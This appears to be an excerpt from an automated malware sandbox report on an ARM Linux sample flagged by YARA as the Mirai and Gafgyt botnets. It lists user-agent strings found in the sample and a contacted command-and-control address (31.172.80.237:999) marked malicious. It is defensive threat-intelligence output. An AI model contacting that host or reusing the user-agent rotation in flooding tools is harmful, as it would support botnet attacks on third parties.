Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Source: Initial sample User agent string found: Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Source: Initial sample User agent string found: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Source: Initial sample User agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: Initial sample User agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Source: Initial sample User agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Source: Initial sample User agent string found: Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Source: Initial sample User agent string found: Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Source: Initial sample User agent string found: Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Source: Initial sample User agent string found: Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Source: Initial sample User agent string found: Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: Initial sample User agent string found: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36

Remote Access Functionality
barindex
Yara detected Gafgyt
Source: Yara match File source: qkdjdjj888.arm7.elf, type: SAMPLE
Yara detected Mirai
Source: Yara match File source: qkdjdjj888.arm7.elf, type: SAMPLE
Source: Yara match File source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5531, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5533, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5535, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5537, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
31.172.80.237
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true

Contacted URLs

Name Malicious Antivirus Detection Reputation
31.172.80.237:999 true
    		unknown